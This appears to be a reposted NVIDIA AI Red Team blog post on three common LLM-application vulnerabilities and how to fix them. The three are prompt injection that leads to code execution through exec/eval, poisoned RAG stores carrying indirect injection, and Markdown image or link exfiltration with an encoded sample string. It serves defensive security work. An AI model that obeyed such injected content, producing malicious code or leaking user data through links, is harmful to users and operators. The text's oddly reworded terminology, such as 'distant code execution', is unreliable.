During the last several years, the NVIDIA AI Red Team (AIRT) has evaluated quite a few and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and potential security weaknesses that, if addressed during development, can significantly improve the safety of LLM-based applications.
Common findings
On this blog, we share key findings from those assessments and find out how to mitigate essentially the most significant risks.
Vulnerability 1: Executing LLM-generated code can result in distant code execution
One of the crucial serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they’re sometimes prolonged to more complex tasks, similar to performing mathematical calculations, constructing SQL queries, or generating code for data evaluation.
The chance? Attackers can use prompt injection, direct or indirect, to control the LLM into producing malicious code. If that output is executed without proper sandboxing, it could result in distant code execution (RCE), potentially giving attackers access to the total application environment.


The fix here is obvious: avoid using exec, eval, or similar constructs—especially in LLM-generated code. These functions are inherently dangerous, and when combined with prompt injection, they will make RCE almost trivial. Even when exec or eval are nested far into the library and potentially protected by guardrails, an attacker can encapsulate their malicious command in layers of evasion and obfuscation.
In Figure 1, a prompt injection gains RCE through encapsulation in guardrail evasions (shown in green), prompt engineering across the system prompts introduced by calls within the library (blue and orange) before the ultimate payload (pink).
As a substitute, structure your application to parse the LLM response for intent or instructions after which map those to a predefined set of protected, explicitly permitted functions. If dynamic code execution is needed, be certain it’s executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one option to approach this safely.
Vulnerability 2: Insecure access control in retrieval-augmented generation data sources
Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that allows applications to include up-to-date external data without retraining the model. The knowledge retrieval step will also be a vector for attackers to inject data. In practice, we see two major weaknesses related to RAG use:
First, permission to read sensitive information might not be accurately implemented on a per-user basis. When this happens, users may have the option to access information in documents that they shouldn’t have the option to see. We commonly see this occur in the next ways.
- The permissions in the unique source of the info (e.g., Confluence, Google Workspace) haven’t been accurately set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
- The RAG data store doesn’t faithfully reproduce source-specific permissions, often by use of an overpermissioned “read” token to the unique source of the documents.
- Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.
Reviewing how delegated authorization is managed to the document or data sources may help catch this issue early, and teams can design around it.
The opposite serious vulnerability we commonly see is broad access to write down to the RAG data store. For example, if a user’s emails are a part of the info within the retrieval phase of a RAG pipeline, anyone with that knowledge could have the content included in the info the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases might be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is usually an early element of an attack chain, with later objectives starting from simply poisoning application results on a particular topic to exfiltrating the user’s personal documents or data.
Mitigating broad write access to the RAG data store might be quite difficult, because it often impacts the specified functionality of the appliance. For instance, with the ability to summarize a day’s value of email is a potentially invaluable and vital use case. On this case, mitigation must occur at other places in the appliance or be designed around the particular application requirements.
Within the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results could be a useful approach. Within the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to pick between only their documents, documents only from people of their organization, and all documents may help limit the impact of maliciously shared documents.
Content security policies (see the subsequent vulnerability) might be used to scale back the chance of knowledge exfiltration. Guardrail checks might be applied to augmented prompts or retrieved documents to be sure that they’re in truth on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) might be established which can be more tightly controlled to stop malicious document injection.
Vulnerability 3: Lively content rendering of LLM outputs
The usage of Markdown (and other energetic content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. Nonetheless, the AI Red Team still finds this vulnerability in LLM-powered applications.
By appending content to a link or image that directs the user’s browser to an attacker’s server, that content will appear within the logs of the attacker’s server if the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker’s domain to fetch the image data. This same network call can even include encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information similar to the user’s conversation history right into a link, resulting in data exfiltration.
Sources


Similarly, in Figure 3, hyperlinks might be used to obfuscate the destination and any appended query data. That link could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it within the query string as shown.
click here to learn more!


To mitigate this vulnerability, we recommend a number of of the next:
- Use image content security policies that only allow images to be loaded from a predetermined list of “protected” sites. This prevents the user’s browser from rendering images mechanically from an attacker’s servers.
- For energetic hyperlinks, the appliance should display the whole link to the user before connecting to an external site, or links ought to be “inactive,” requiring a copy-paste operation to access the domain.
- Sanitize all LLM output to try to remove markdown, HTML, URLs, or other potential energetic content that’s generated dynamically by the LLM.
- As a final resort, disable energetic content entirely inside the user interface.
Conclusion
The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them. Our top three most important findings are execution of LLM-generated code resulting in distant code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and energetic content rendering of LLM outputs resulting in data exfiltration. By on the lookout for and addressing these vulnerabilities, you possibly can secure your LLM implementation against essentially the most common and impactful vulnerabilities.
In the event you’re fascinated about higher understanding the basics of adversarial machine learning, enroll within the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work on this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.
